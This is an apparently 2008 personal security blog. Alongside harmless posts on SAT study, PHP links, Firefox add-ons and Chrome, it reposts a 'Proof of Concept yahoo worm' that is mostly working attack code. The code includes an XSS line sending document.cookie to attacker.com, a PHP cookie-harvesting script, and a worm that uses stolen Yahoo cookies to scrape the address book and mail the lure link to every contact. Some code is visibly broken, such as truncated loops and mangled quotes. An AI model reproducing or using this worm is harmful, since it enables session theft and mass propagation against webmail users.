Time to hit the books

2008-10-11T21:55:00.000-07:00

Ive recently purchased this book "The Official SAT Study Guide" and I do have alot of reading and studying to do which I admit I hate sutdying. But I will have to take some time to sit down and read this and do a few notes its going to be a b*tch but I want to goto college sense my current life is not the best. But if your going to take this test soon I recommend purchasing this book and hit the books!

php for beginners

2008-10-11T21:19:00.000-07:00

php is a widely know programming language its a good thing to know these days because coporations are looking for decent programmers. Now the good thing about php is you can do various things with it. Theres also a nice little side scripting language that goes with php that is called cURL. So here are some good links to learn PHP and cURL so check it out!

www.phpvideotutorials.com

www.php.net

www.w3schools.com/PHP/DEfaULT.asP

www.killerphp.net

Enjoy and learn something new now it will take a few weeks to grasp the language just practice and set goals.

FireFox One Oh One

2008-10-10T16:15:00.000-07:00

I thought I would share some good add-ons that will help your FireFox security and overall performance.

FlashBlock:
Never be annoyed by a Flash animation again! Blocks Flash so it won't get in your way, but if you want to see it, just click on...
addon

NoScript:
The best security you can get in a web browser!
Allow active content to run only from sites you trust, and protect yourself against XSS and Clickjacking attacks.
addon

TrackMeNot:
Protects users against search data profiling...
addon

Well there are three add-ons I enjoy and enhance my FireFox browser security so feel free to add them and have fun.

Chrome browser still making an impact

2008-10-10T15:55:00.000-07:00

As we all know the Chrome browser has been out for sometime now and when it first hit the internet it was a big hit. Millions of people fell in love with the browser I watched several forums get set up dedicated to the browser. Now there has been firefox add-on releases to make your firefox browser look like the Chrome browser.

Now I don't see the point in it you still don't get the speed and whit of the Chrome browser.
We all love the speed and the options for the Chrome browser such as if a flash or video item is freezing the page it will take that out of the page and undo the freeze nice feature right. And the fact that the Chrome browser is in its beta stage is amazing I cannot wait until the full version is released.

There were big exploits that were released when the Chrome browser hit the market at first but they have been fixed. Just make sure to update your browser and happy surfing, if you do use the Chrome browser as your main browser then please watch what websites you search remember its still in the beta stage. Download The Chrome Browser Here

Yahoo

2008-10-10T15:34:00.000-07:00

found this while browsing the web; enjoy the read

Proof of Concept yahoo worm by -Gonzalez

1. DESCRIPTION

Using Cross Site Scripting ( XSS ) attack's give's us the possiblity to impersone one legitim user ( victim ) that is a registered on a website ( target )

In this tutorial will suppose the target site has a XSS vulnerability which give's an attacker to inject a "bad code" into a page.

First, let's follow this step's :

a. The victim certify's on the target site
b. The attacker send's a link to a page ( with the "bad code" ) from the target site to the victim
c. The victim navigate's to the page
d. The page code load's a script from another location sending the victim's cookies
e. The script use's this cookie to act like the victim on target site

I'll illustrate now ( with example's ) :

We suppose the victim is allready certifyed on the target site

The target has a XSS vulnerability :
http://www.target.com/page.php?var=

The attacker send's the link to his victim :
"http://www.target.com/page.php?var="

When the victim follow's the link; the script "js.js" is loaded and executed by the browser

===== js.js =====

Code:

new Image().src='http://www.attacker.com/php.php?cookie= '+escape(document.cookie);

=================

The file "js.js" contain's a code which does a request to the file "php.php" - controled by the attacker.

===== php.php =====

$domain=".target.com"; // cookie domain

$cookie=$_GET['cookie'];

//we create the file , supposeing the cookie session has more sequence's "name=value; "

$hcook=fopen("cookie.txt","w");

$params=split('; ',$cookie);

for($i=0; $i

{

$eqpos=strpos($params[$i],"=");

$name =substr($params[$i],0,$eqpos);

$value=substr($params[$i],$eqpos+1,strlen($params[$i]));

fwrite($hcook,$domain. " TRUE / FALSE 9999999999 ".$name." ".$value." ");

}

fclose($hcook);

// we make any curl request useing "cookie.txt" as CURLOPT_COOKIEFILE and CURLOPT_COOKIEJAR

The "php.php" file is esential to this kind of attack.
This steal's the victim's cookie and use's it to look like the victim on the target site.
The reason for useing a php script in place of a javascript is to pass the javascript polics, haveing the possibility if requesting to anykind of domain where the cookie is valid.
We can receive and send data to the target site and manipulate in any kind of mode.

2. YAHOO! MAIL Worm PoC

Will suppose that Yahoo! has a XSS vulnerability like the following form :
"http://xxx.yahoo.com/page?var="

a. The attacker send's an emails containing the link to http://xxx.yahoo.com/page?var= to the victim
b. The victim follow's the link ( Ok, pause. Let's name the victim BILL )
c. "worm.php" file is stealing BILL's cookie and useing it to send a mail to every person from his Address Book
d. The person's from BILL's Address Book become victim's when they follow the link from the email, which seeming to come from a victim

===== worm.php =====

$subject="Link for you"; // message subject

$message ="Look a cool link, CLICK ME!"; // message body

// We eliminate the need of a "js.js" file checking the parameter value of "cookie"

// If this doesn't exist we type the content of "js.js" file

// and if exist's we continue with "php.php"

if(!isset($_GET['cookie']))

{

$scripturl="http://".$HTTP_HOST.$REQUEST_URI;

print("new Image().src='".$scripturl."?cookie='+escape(document.cookie);");

}

else

{

$cookie=$_GET['cookie'];

// We create a unique name for the file were we'll save the cookie ensureing this way

// that when a lot of victim's access simultaneuously the script; the cookie's will not overwrite

$cookiefile=rand(100,999).".txt";

// we create the cookie file

$hcook=fopen($cookiefile,"w");

$params=split('; ',$cookie);

for($i=0; $i

{

$eqpos=strpos($params[$i],"=");

$name =substr($params[$i],0,$eqpos);

$value= substr($params[$i],$eqpos+1,strlen($params[$i]));

fwrite($hcook,".yahoo.com TRUE / FALSE 9999999999 ".$name." ".$value." ");

}

fclose($hcook);

// We try the Yahoo! address book for data extraction all about the contact's and create a variable of the form

// "contact1@yahoo.com,contact2@yahoo.com, etc.." as well finding the domain us.fXXX.mail.yahoo.com

// which change's each time there is a certify!

$address=curl("http://address.mail.yahoo.com/","",$cookiefile);

if(strpos($address,"Yahoo! Address Book")==true) // if the page was loaded correctly

{

$apage=explode(" ",$address);

foreach($apage as $line_num => $aline)

{

if(strstr($aline,"ymsgr:sendIM"))

{

$ex =explode("?",$aline);

$ex2=explode(""",$ex[1]);

$id=$ex2[0];

$to=$to.$ex2[0]."@yahoo.com,";

}

if(strstr($aline,"Compose"))

{

$ex3=explode("/",$aline);

$domain="http://".$ex3[2];

}

}

}

// We load the "Compose" formular situaten on us.fXXX.mail.yahoo.com for finding the formular's action

// to send email and parameter value ".crumb" which we need for sending message's

if(strlen($to)>0 && strlen($domain)>0) // if we have the 2 variable's

{

$compose= curl($domain."/ym/Compose?","",$cookiefile);

if(strpos($compose,"Yahoo! Mail")==true) // if the page was loaded correctly

{

$cpage=explode(" ",$compose);

foreach($cpage as $line_num => $cline)

{

if(strstr($cline,"form name="Compose""))

{

$ex4=explode(""",$cline);

$action=$ex4[5];

}

if(strstr($cline,".crumb"))

{

$ex6=explode(""",$cline);

$crumb=$ex6[3];

}

}

}

if(strlen($action)>0 && strlen($crumb)>0) // if we have the 2 variable's

{

$subject=str_replace(" ","+",$subject);

$message=str_replace(" ","+",$message);

// we generate POSTFIELDS for curl

$post ="SEND=1&SD=&SC=&CAN=&docCharset= iso-8859-1&PhotoMailUser=&PhotoToolInstall=&";

$post.="OpenInsertPhoto=&PhotoGetStart= 0&SaveCopy=no&PhotoMailInstallOrigin=&";

$post.="box=&.crumb=".$crumb."&";

$post.="FwdFile=&FwdMsg=&FwdSubj=&FwdInline= &OriginalFrom=&OriginalSubject=&";

$post.="InReplyTo=&NumAtt=0&AttData=&UplData= &OldAttData=&OldUplData=&FName=&";

$post.="ATT=&VID=&Markers=&NextMarker= 0&Thumbnails=&PhotoMailWith=&BrowseState=&";

$post.="PhotoIcon=&ToolbarState=&VirusReport= &Attachments=&BGRef=&BGDesc=&BGDef=&";

$post.="BGFg=&BGFF=&BGFS=&BGSolid=&BGCustom= &PlainMsg=&PhotoFrame=&PhotoPrintAtHomeLink=&";

$post.="PhotoSlideShowLink=&PhotoPrintLink= &PhotoSaveLink=&PhotoPermCap=&PhotoPermPath=&";

$post.="PhotoDownloadUrl=&PhotoSaveUrl= &PhotoFlags=&start=compose&bmdomain=&hidden=showcc&";

$post.="showbcc=&AC_Done=&AC_ToList= &AC_CcList=&AC_BccList=&sendtop=Send&";

$post.="savedrafttop=Save+as+a+Draft&canceltop= Cancel&To=".$to."&Cc=&Bcc=&";

$post.="Subj=".$subject."&Body=".$message."&Format= html&SigAtt=1&sendbottom=Send&";

$post.="savedraftbottom=Save+as+a+Draft&cancelbottom=Cancel&";

// sending the mail's

$mail=curl($domain.$action,$post,$cookiefile);

}

}

unlink($cookiefile);

}

function curl($url,$post='',$cookiefile) // function to easy the curl request's

{

$rand=rand(100000,400000);

$agent="Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/".$rand." Netscape/7.1 (ax)";

$ch=curl_init();

curl_setopt($ch,CURLOPT_URL,$url);

curl_setopt($ch,CURLOPT_USERAGENT,$agent);

curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);

curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);

if($post!=='')

{

curl_setopt($ch,CURLOPT_POST,1);

curl_setopt($ch,CURLOPT_POSTFIELDS,$post);

}

curl_setopt($ch,CURLOPT_COOKIEFILE,$cookiefile);

curl_setopt($ch,CURLOPT_COOKIEJAR,$cookiefile);

curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);

$result=curl_exec($ch);

curl_close($ch);

if($result=="") { curl($url,$post); } else { return $result; }

}

===================

The impact of this kind of worm can be huge!

Thank's for reading and hope you learned something

therisingexploitation

2008-10-09T21:59:00.000-07:00

Hello and welcome to therisingexploitation I will be blogging about my general interest in security and the latest things going around. I will try to provide some code for each post but if I can't I will try to provide some examples. So if you want good content its going to be some time before new post are made but this blog will be active.
If you wish to submit some content to the blog or ask a question and have us answer it on the blog them message us here therisingexploitation@gmail.com